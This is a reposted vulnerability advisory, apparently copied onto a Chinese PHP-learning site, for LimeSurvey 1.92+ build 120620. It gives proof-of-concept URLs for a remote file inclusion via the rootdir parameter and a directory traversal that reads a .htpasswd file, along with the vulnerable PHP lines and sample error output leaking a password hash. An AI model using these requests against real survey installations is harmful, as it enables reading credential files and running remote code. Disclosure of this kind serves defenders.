来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 发现者 dun \ posdub[at]gmail.com [ LimeSurvey 1.92+ build 120620 ] Multiple Vulnerabilities #影响程序: LimeSurvey - the free and open source survey software tool官网: http......
发现者 dun \ posdub[at]gmail.com
[ LimeSurvey 1.92+ build 120620 ] Multiple Vulnerabilities # 影响程序: "LimeSurvey - the free and open source survey software tool" 官网: http://www.limesurvey.org/ 下载地址: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip # [RFI] ( allow_url_include = On; register_globals = On; ) 影响版本: 1.92+ build 120620 测试: http://www.2cto.com /limesurvey/replacements.php?rootdir=http://localhost/phpinfo.txt? File: ./limesurvey/replacements.php (line 3) ...cut... <?php global $rootdir; include_once($rootdir.'/classes/expressions/LimeExpressionManager.php'); // [RFI] ...cut... # [目录遍历] ( display_errors On; register_globals = On; ) 影响版本: 1.92+ build 120620 and previous # 测试: http://www.2cto.com /limesurvey/admin/importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=../../secret/.htpasswd File: ./limesurvey/admin/importsurvey.php (lines 18-38) ...cut... if ((!isset($importingfrom) && !isset($copyfunction)) || isset($_REQUEST['importingfrom'])) // 1 false if $copyfunction is set { die("Cannot run this script directly"); } require_once('import_functions.php'); // 2 include functions if (!isset($copyfunction)) { $sFullFilepath=$the_full_file_path; $aPathInfo = pathinfo($sFullFilepath); $sExtension = $aPathInfo['extension']; } $bImportFailed=false; if (isset($sExtension) && strtolower($sExtension)=='csv') { $aImportResults=CSVImportSurvey($sFullFilepath); } elseif (isset($sExtension) && strtolower($sExtension)=='lss') // 3 true if $sExtension = 'lss' { $aImportResults=XMLImportSurvey($sFullFilepath,null,null, null,(isset($_POST['translinksfields']))); // 4 $sFullFilepath -> our file ...cut... File: ./limesurvey/admin/import_functions.php (lines 1080-1087) ...cut... function XMLImportSurvey($sFullFilepath,$sXMLdata=NULL,$sNewSurveyName=NULL,$iDesiredSurveyId=NULL, $bTranslateInsertansTags=true) { global $connect, $dbprefix, $clang, $timeadjust; $results['error']=false; if ($sXMLdata == NULL) { $xml = simplexml_load_file($sFullFilepath); // 5 try to open our file as xmlfile ...cut... This should return a warning with the first line of our file. In this case: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ from .htpasswd :) Something like this: Warning: simplexml_load_file() [function.simplexml-load-file]: ../../secret/.htpasswd:1:parser error : Start tag expected, '<' not found in /www/limesurvey/admin/import_functions.php on line 1087 www.2cto.com Warning: simplexml_load_file() [function.simplexml-load-file]: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ in /www/limesurvey/admin/import_functions.php on line 1087 Warning: simplexml_load_file() [function.simplexml-load-file]: ^ in /www/limesurvey/admin/import_functions.php on line 1087 ## |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com